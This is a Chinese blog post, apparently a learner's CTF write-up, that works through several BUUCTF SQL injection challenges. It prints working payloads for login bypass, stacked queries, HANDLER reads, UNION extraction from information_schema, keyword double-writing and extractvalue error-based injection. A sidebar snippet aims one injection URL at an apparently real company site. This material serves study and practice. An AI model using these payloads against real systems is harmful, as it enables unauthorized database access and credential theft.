CTF-SQL注入

最新推荐文章于 2024-05-11 22:44:48 发布
最新推荐文章于 2024-05-11 22:44:48 发布
阅读量5k 收藏 50
点赞数 5
分类专栏: CTF 文章标签: web安全 安全 网络安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/125135186
版权

目录

BUUCTF-[极客大挑战 2019]EasySQL

BUUCTF-[强网杯 2019]随便注

方法一

方法二 

BUUCTF-Blacklist

BUUCTF-[SUCTF 2019]EasySQL

BUUCTF-[极客大挑战 2019]LoveSQL

 BUUCTF-[极客大挑战 2019]BabySQL

 BUUCTF-[极客大挑战 2019]HardSQL

BUUCTF-[GXYCTF2019]BabySQli 

总结做到的几个CTF中的sql注入的题。下面的题目逐渐由简单到困难,逐步递增。感谢BUUCTF供题。

BUUCTF-[极客大挑战 2019]EasySQL

拿到题目是下面的界面,先尝试了弱口令。没成功。

尝试万能密码。payload:admin' or 1=1# 密码随便输入,即可实现了登录。

BUUCTF-[强网杯 2019]随便注

 这里用到的方法是堆叠注入。自己理解的堆叠注入的原理就是,如果在开启多语句的执行的情况下,可以使用拼接的方法,来实现多条语句的执行。例如1;show databases;那么这就是有两条语句组成的sql语句,会分别执行语句1和语句2.

这里判断出是字符型注入,并且有两个字段。

之后就来判断回显点。payload为-1' union select 1,2#但是发现有正则过滤的:

 这里就是用了堆叠注入。1';show databases;#

查看当前数据库中的表名:show tables;#

发现存在两个表,先来看一下表名为“1919810931114514”的表中存在的列,show columns from `1919810931114514`,这里要注意,当表名为数字的时候,在引用的时候要加上反引号。

之后就可以去查询flag中的内容,自己学会了两种方法,对于将两个表名重命名的方法,有点点没搞清楚(懂了,但没完全懂)。

方法一

由于过滤了select等关键字,所以可以使用select * from `1919810931114514`;将该条语句进行十六进制编码。使用prepare关键字来进行相应的预处理,从而实现查询。

payload:

1';set @sql = 0x73656C656374202A2066726F6D20603139313938313039333131313435313460;PREPARE hacker from @sql;EXecute hacker;#

PREPARE...from...是预处理语句,进行编码转化。

execute是用来执行由prepare创建的SQL语句。

set是对一个变量进行赋值。

方法二 

使用handler获取内容。

1';handler `1919810931114514` open;handler `1919810931114514` read first;handler `1919810931114514` close;#

接下来的blacklist就是使用handler这种方法来完成的。 

BUUCTF-Blacklist

这里看到和上面的题很类似,就采用了堆叠注入。1';show tables;#

 然后使用handler。payload为1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

BUUCTF-[SUCTF 2019]EasySQL

感觉这个题和上面的堆叠注入很相似,尝试堆叠注入:

这里尝试的payload为1;show databases;#居然报错了,然后紧接着尝试了1;show tables;#

这里尝试了好多方法都不行。比如上面的handler方法、以及使用set、prepare...from...等方法都回显nonono。束手无策了,看了大佬的wp。

输入1,回显:

Array( [0] =>  1)

输入其他的字符或者0,没有回显。

输入select、handler等关键字回显nonono

猜测这里的查询语法是

select $_GET['query'] || flag from Flag

#||操作符:如果前面为真,则后面不执行,所以我们在传入1的时候,语句就变成了select 1 from Flag;

大佬采用的方法为操作符重置的方法:set sql_mode=PIPES_AS_CONCAT;

payload:

1;set sql_mode=PIPES_AS_CONCAT;select 1

BUUCTF-[极客大挑战 2019]LoveSQL

这里前面的判断注入就不进行判断了,我直接来判断回显点。

 这里判断出2,3处可以回显。

加下来就是判断处数据库。-1' union select 1,database(),3#

 开始查表->-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='geek'),3#

 查表中的列名:-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'),3#

 

接下来就是查id,username,password等具体的内容:

 -1' union select 1,(select group_concat(id,username,password) from l0ve1ysq1),3#

 BUUCTF-[极客大挑战 2019]BabySQL

看来就是升级版咯(肯定是做了过滤吧)

同样还是先使用万能密码,admin' or 1=1#,password随便输入了。发现了报错,错误提示是1=1#右边 那就是or被过滤了,尝试双写一下。

 成功登陆进来了。紧接着就是和之前一样,先来判断字段数,之后就是判断回显点。 

 判断字段数,oorrder bbyy 4#报错,3的时候正常回显。(by关键字被过滤)

 构造payload:-admin' union select 1,2,3#但是发现了union 和 select同样也是被过滤了。还是经过了双写绕过。payload为-admin' ununionion seselectlect 1,2,3#

 下面就是查数据库名:-admin' ununionion seselectlect 1,database(),3#

查询数据库中的表: -admin' ununionion seselectlect 1,(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'),3#  这里经过测试from和where也都被过滤了。

查列名: -admin' ununionion seselectlect 1,(selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'),3# 

继续查id,password,username等信息。

-admin' ununionion seselectlect 1,(selselectect group_concat(id,username,passwoorrd) frfromom b4bsql),3# 

 BUUCTF-[极客大挑战 2019]HardSQL

又是加强版了.

哎这里输入什么都被抓住。看了一下大佬的wp,使用报错注入。其中过滤了空格和=号,可以使用()代替空格,like代替=号,用’^'来连接函数,形成异或。

故这里构造的payload为:admin'^extractvalue(1,concat(0x7e,database()))#

随后就是查表名和列名。

查询表名:

admin'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))#

查询列名:

admin'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))#

接下来就是查询具体的信息

admin'^extractvalue(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1))))#

 哦吼,需要改一下了查询left的20个字符。使用到了right和left。

admin'^extractvalue(1,concat(0x7e,(select(left(password,30))from(H4rDsq1))))#
admin'^extractvalue(1,concat(0x7e,(select(right(password,30))from(H4rDsq1))))#

分别爆左右:

 

BUUCTF-[GXYCTF2019]BabySQli 

进入登录界面,尝试万能密码

发现注释中的编码,尝试解码,base32解码得到了base64编码,在经过base64解码得到如下的代码:

select * from user where username = '$name'

这里发现如果账号不是admin的话,回显为wrong user!

 账号为admin的时候,密码不对的情况,回显为wrong pass!

 判断下字段数,结果发现了过滤。尝试下大小写。

 当为4的时候,报错了。

做到这里就不会了,看了大佬的wp,说在联合查询不存在的数据的时候,联合查询就会构造一个虚拟的数据。这里的字段1应该是id,后面才是账号和密码。所以构造一个虚拟的数据。

payload为:

name=1' union select 0,'admin','e10adc3949ba59abbe56e057f20f883e'%23&pw=123456

这个题还是要继续好好吸收一下原理。(懂但是没有完全懂)

Y4y17
关注
  • 5
    点赞
  • 50
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 389
个人CTF学习之路
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 431
关于SQL注入的相关CTF笔记
CTFer成长之路之CTF中的SQL注入
自强不息
02-20 1497
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTFSHOW-sql注入
Yb_140的博客
08-13 2452
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1294
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
CTFHub | web—SQL注入(字符型注入
2301_76435948的博客
09-26 252
如果满足以上三点,可以判断该url为字符型注入。服务端的sql语句为:select 列 from 数据库.表 where name=‘$name’
My-CTF-Challenges
05-16
它简化了数据处理的过程,但也可能带来安全风险,因为未经验证的数据可以直接注入到对象中,可能导致SQL注入或其他类型的安全漏洞。 **反序列化:** 反序列化是将从网络或磁盘读取的序列化数据转换回其原始对象的...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQLi-CTF-master.zip
04-09
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决各种安全挑战来获取积分,而SQLi-CTF通常是指在CTF比赛中涉及SQL注入的特定类型挑战。 在SQL注入攻击中,攻击者可以向应用程序输入恶意的SQL代码,以...
CTF-Write-up:CTF撰写和信息
03-21
4. **漏洞分析**:详细解释发现的漏洞类型及其原理,例如SQL注入、XSS跨站脚本攻击或缓冲区溢出。 5. **解题步骤**:按照时间顺序,一步步记录解决问题的过程,包括尝试的方法、遇到的困难以及解决方案。 6. **...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
攻防_漏洞_SQL注入_SQL注入常用方法
redglare的博客
12-01 2257
SQL注入常用方法
bugku ctf 实战2-注入
qq_42777804的博客
08-08 2701
     进去之后发现       wtf!?     这个怎么可以注入  !?????? 经过不断的点击发现     有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来      正常的数字型注入   利用联合查询   http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20s...
CTF-命令注入【超详细】
不知名白帽的博客
09-05 9145
CTF-命令注入【超详细】
CTF_WEB学习-------------RCE之命令注入
qq_45616570的博客
07-14 2933
CTF_WEB学习-------------RCE之命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。 RCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。 RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
CTF模板注入
weixin_43952190的博客
07-30 4191
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构
CTF-命令注入
不知名白帽的博客
05-28 1060
CTF-命令注入,实验环境:(192.168.20.128),靶机(192.168.20.141)。通过信息探测,深入挖掘隐藏信息,获取账号和密码,用searchsploit搜寻漏洞,再用msfconsole进行监听,然后用base64绕过防火墙,生成sehll,上传shell,反弹shell...
南邮CTF--SQL注入
weixin_34219944的博客
05-18 313
南邮CTF--SQL注入题 题目:GBK SQL injection 解析: 1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清题目,GBK,接下来利用宽字节进行注入 2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功 3.继续改参数,1=2时,没有任何信息,找到注入点 4.利用order by 查询列数,当查询2时,显...
记一道CTF 中遇到的SQL注入新型万能密码问题
大方子
10-09 8124
0x00. 引言 我们平时遇到的SQL注入万能密码都是形如admin' or '1'='1, 这种使用or 关键字使得查询结果永真,或者形如:' UNION Select 1,1,1 FROM admin Where ''=',这种使用union使得查询结果永真, 但是有一次我在CTF的比赛中遇到的SQL注入问题,使用这两种万能密码都不好使,不管怎么变换形式,都不好使,显然是or和union ...
ctf中sql注入题目解法
05-05
在CTF中,SQL注入是一种常见的攻击类型,通常是通过构造恶意输入来绕过应用程序的安全控制,从而访问或篡改应用程序的数据。 以下是一些SQL注入题目的解法: 1. 基于错误的注入:这种类型的注入通常涉及到将错误的输入发送到应用程序,然后观察应用程序返回的错误消息。通过分析错误消息,攻击者可以获得关于数据库的有用信息。例如,攻击者可以尝试通过发送 '和1=2' 的输入来触发一个错误消息。如果返回了一个错误消息,那么攻击者就会知道这个输入是有效的。 2. 基于时间的注入:这种类型的注入利用了数据库查询的延迟响应时间。攻击者可以在输入中添加一些额外的SQL语句,这些语句会导致查询的执行时间变长。通过观察查询的响应时间,攻击者可以获得关于数据库的有用信息。 3. 盲注入:这种类型的注入通常是在攻击者无法看到应用程序返回的响应消息时使用的。攻击者可以尝试发送不同类型的输入来推断数据库中的数据。例如,攻击者可以尝试使用布尔逻辑来确定某个字段中是否存在数据。 4. 堆叠注入:这种类型的注入涉及到在单个输入中添加多个SQL语句。攻击者可以利用这些语句来执行多个操作,例如创建新用户、修改密码等。 5. 直接注入:这种类型的注入涉及到直接在SQL查询中插入恶意代码。攻击者可以利用这些代码来执行任意操作,例如删除数据库中的数据、修改数据库中的数据等。 以上是一些常见的SQL注入题目解法,但是在实际的CTF比赛中,攻击者需要具备较强的技术水平和经验才能成功地解决这些问题。因此,对于CTF选手而言,不断学习和实践是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值